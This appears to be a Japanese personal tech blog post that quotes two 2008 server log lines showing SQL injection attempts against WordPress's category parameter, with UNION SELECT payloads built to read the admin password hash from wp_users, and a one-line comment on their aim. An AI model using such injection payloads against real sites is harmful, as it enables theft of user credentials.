まとまりのないブログ

something which something is something

sql Tips wordpress

sqlインジェクション

投稿日:

ns.km22518.keymachine.de - - [19/Jul/2008:22:25:12 +0900] "GET /wordpress/index.php?cat=%27+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14883 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
ns.km22518.keymachine.de - - [19/Jul/2008:22:25:14 +0900] "GET /wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14877 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

パスワードを割り出そうとしているのか。wordpressのユーザidの1番目のパスワードをselectで取得しようとしているのがログから読み取れる。

-sql, Tips, wordpress

執筆者:


comment

メールアドレスが公開されることはありません。

日本語が含まれない投稿は無視されますのでご注意ください。(スパム対策)

関連記事

no image

結果の行数をカウントする

mysqlで結果の行数をカウントするsql文は、 seletc count(*) from foo; で取得するのが最も簡単ではあるけれど、レコード数が膨大な場合にはパフォーマンスの面で問題になる場合 …

no image

テキスト入力フィールドの入力有無チェック

テキストフィールド内に文字列が入力されているかいないかをチェック。 サンプルコード <script type=”text/javascript”> function check_isnul …

no image

テーブルの列の型を変える(列属性の変更)

mysqlの場合。 ケース1:テーブルのある列の型をtext型で作成してシステムを運用してみたところ、実際にはせいぜい8000文字程度しか使用されていないことがわかったためvarchar型の可変長10 …

no image

サーバにトラブルが発生してウェブサービスが提供できない場合の正しい対処法

ウェブサービスを提供しているサイトでサーバに障害が発生して,一時的にサービスを提供することができない場合の管理者としての正しいと思われる対処方法。

no image

マウスがカクカクする時のチェックする項目

cpu温度 cpu交換とかした場合にcpuクーラーが正しく取り付けられていなくて温度が高温になっているかもしれない。cpu温度に異常がないかチェックしてみる。 マウスの不具合 長く使っているとマウスが …